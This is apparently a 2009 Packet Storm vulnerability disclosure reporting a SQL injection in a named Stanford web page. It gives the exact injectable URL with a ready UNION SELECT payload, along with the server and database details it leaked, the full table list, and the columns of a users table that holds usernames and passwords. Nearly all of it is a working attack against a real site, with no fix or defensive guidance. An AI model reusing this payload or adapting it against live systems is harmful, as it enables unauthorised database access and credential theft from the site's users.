Stanford.edu SQL Injection

2009-02-06T00:00:00
ID PACKETSTORM:74739
Type packetstorm
Reporter Rohit Bansal
Modified 2009-02-06T00:00:00

Description

                                        
                                            `-----------------------------------------------------------------------------------------------  
  
[+] Stanford.edu suffers from a remote SQL injection vulnerability  
[+] Found By: Rohit Bansal  
[+] Date: 06-02-2009  
  
---------------------------------------------------------------------------------------------  
  
  
Host Information  
  
Server = Apache/2.2.3 (Debian) mod_fastcgi/2.4.2 PHP/5.2.0-8+etch13  
mod_ssl/2.2.3 OpenSSL/0.9.8c WebAuth/3.6.0  
Version = 5.0.51a-19~bpo40+1-log  
Powered by = PHP/5.2.0-8+etch13  
Current User = genvironmentwoo@www5.Stanford.EDU  
Current Database = g_environment_woodsfacultydb  
Supports Union = yes  
Union Columns = 12  
  
  
Url| http://woods.stanford.edu/cgi-bin/video.php?videoid=23  
  
Vuln: http://woods.stanford.edu/cgi-bin/video.php?videoid=23 +and+1=0+ Union  
Select 1 ,2,3, UNHEX(HEX([visible])) ,5,6,7,8,9,10,11,12  
  
Comment: --  
  
Visible Column: 4  
  
Hexed: True  
  
Database:g_environment_woodsfacultydb  
information_schema  
g_environment_woodsfacultydb  
  
Tables:users  
StudentGroups  
adcouncil  
agendas  
announcements  
biofuels  
carbon  
cccp  
ecosystem  
events  
evp  
evpIDseed  
evpRFP  
evploi  
evppeople  
evpreport  
facultydb  
globalwater  
groundwater  
homepage  
images  
locations  
loiReviewers  
loireview  
mailinglist  
news  
newssource  
pacsalmon  
rfpreview  
seeds  
staff  
staffCenters  
users  
video  
waterwest  
woodsnews  
  
Columns: Table users  
username  
password  
fullname  
fname  
lname  
auth_state  
timestamp  
cryptword  
  
---------------------------------------------------------------------------------------  
[+]^Rohit Bansal [rohitisback@gmail.com]  
[+] SecurenSafe, Schap.org, Infysec, Evilfinger,  
---------------------------------------------------------------------------------------  
`